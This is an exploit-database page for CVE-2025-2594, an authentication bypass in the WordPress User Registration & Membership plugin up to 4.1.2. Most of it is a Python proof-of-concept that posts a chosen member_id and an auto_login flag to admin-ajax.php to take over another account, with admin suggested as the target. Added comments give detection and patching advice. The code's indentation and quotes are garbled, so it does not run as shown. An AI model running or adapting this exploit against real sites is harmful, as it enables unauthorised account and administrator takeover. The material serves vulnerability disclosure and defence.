WordPress User Registration & Membership Plugin 4.1.2 – Authentication Bypass

Exploit Details

Basic Information

Exploit Title WordPress User Registration & Membership Plugin 4.1.2 – Authentication Bypass
Exploit ID EDB-ID:52302
Type exploitdb
Published 2025-05-25T00:00:00
Modified 2025-05-25T00:00:00

CVSS Information

CVSS Score 8.1
Severity HIGH
Vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2025-2594

Exploit Description

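Proof-of-concept script for CVE-2025-2594, an authentication bypass in the WordPress User Registration & Membership plugin, versions <= 4.1.2. The script sends one POST to `/wp-admin/admin-ajax.php` for the `user_registration_membership_confirm_payment` action with a caller-supplied `member_id`, and reports success when the reply is HTTP 200 and contains `"success":true`. Sites running an affected version should update to a release newer than 4.1.2.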

Exploit Code

#!/usr/bin/env python3

# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 – Authentication Bypass

# Date: 2025-05-22

# Exploit Author: Mohammed Idrees Banyamer

# Vendor Homepage: https://wordpress.org/plugins/user-registration/

# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip

# Version: <= 4.1.2
# Tested on: WordPress 6.x, Apache on Linux

# CVE: CVE-2025-2594

import requests

import sys

import argparse

from urllib.parse import urljoin

from termcolor import cprint, colored

def banner():
    """Print the five-line cyan banner naming the plugin, the CVE and the author."""
    rows = (
        "┌──────────────────────────────────────────────┐",
        "│ WordPress Plugin User Registration <= 4.1.2 │",
        "│ Authentication Bypass Exploit (CVE-2025-2594)│",
        "│ Author: Mohammed Idrees Banyamer │",
        "└──────────────────────────────────────────────┘",
    )
    # Every row is printed in the same colour, so one loop replaces five calls.
    for row in rows:
        cprint(row, "cyan")

# exploit(): send one multipart POST to admin-ajax.php under target_url for the
# plugin's payment-confirmation AJAX action, then report the outcome from the
# HTTP status and response body. Returns nothing; all output goes to stdout.
#
# NOTE(review): this listing lost its indentation and its ASCII quotes when the
# page was extracted, so it is not valid Python as shown. The code is left
# exactly as published; only these comments are added.
#
# Defender's reading of the request:
#   - No cookies or credentials are attached, so the call is unauthenticated.
#   - member_id is chosen by the caller. The advisory title implies that
#     affected versions (<= 4.1.2 per the header) do not tie that value to the
#     requester -- confirm against the vendor changelog.
#   - Mitigation: update the plugin to a release newer than 4.1.2.
def exploit(target_url, member_id, nonce):

endpoint = urljoin(target_url, “/wp-admin/admin-ajax.php”)

# (None, value) tuples passed via files= make requests send each entry as a
# plain multipart/form-data field with no filename.
# Detection note: the action name is in the request body, not the URL, so
# access logs that record only the request line show just a POST to
# admin-ajax.php. Matching on the action needs body inspection (WAF or
# application-level logging).
files = {

‘action’: (None, ‘user_registration_membership_confirm_payment’),

‘security’: (None, nonce),

‘form_response’: (None, ‘{“auto_login”: true}’),

‘member_id’: (None, str(member_id))

}

cprint(f”[+] Target URL: {endpoint}”, “yellow”)

cprint(f”[+] Attempting to bypass authentication as user ID {member_id}…\n”, “yellow”)

try:

# Single request with a 10-second timeout; no retry and no session reuse.
response = requests.post(endpoint, files=files, timeout=10)

# Success is inferred only from HTTP 200 plus the literal substring
# '"success":true' in the body. The script does not read Set-Cookie, so its
# "may now be authenticated" message is an inference, not a verified login.
if response.status_code == 200 and ‘”success”:true’ in response.text:

cprint(“[✓] Exploit successful! Authentication bypass achieved.”, “green”)

cprint(“[!] Check your session/cookies – you may now be authenticated as the target user.\n”, “green”)

print(“Server Response:”)

print(response.text)

else:

cprint(“[-] Exploit failed or invalid nonce/member_id.”, “red”)

print(“Server Response:”)

print(response.text)

# Only transport-level failures raised by requests are caught here.
except requests.exceptions.RequestException as e:

cprint(f”[!] Request failed: {e}”, “red”)

def main():
    """Print the banner, parse three positional arguments and call exploit().

    Arguments, in order: ``target`` (base URL), ``member_id`` and ``nonce``.
    No ``type=`` is given, so all three reach exploit() as strings.

    Per its help text, the nonce is read from the registration page, so it is
    available to unauthenticated visitors. A nonce of that kind works as a
    request token and is not an access control.
    """
    banner()

    cli = argparse.ArgumentParser(
        description="CVE-2025-2594 – WordPress Plugin Authentication Bypass"
    )
    # The positionals are declared in the order they must appear on the
    # command line.
    positional_help = (
        ("target", "Base target URL (e.g., http://localhost)"),
        ("member_id", "Target user ID (usually 1 for admin)"),
        ("nonce", "_confirm_payment_nonce value from registration page"),
    )
    for arg_name, arg_help in positional_help:
        cli.add_argument(arg_name, help=arg_help)

    parsed = cli.parse_args()
    exploit(parsed.target, parsed.member_id, parsed.nonce)

# Run the command-line entry point only when the file is executed as a script,
# so that importing the module has no side effects.
if __name__ == "__main__":
    main()
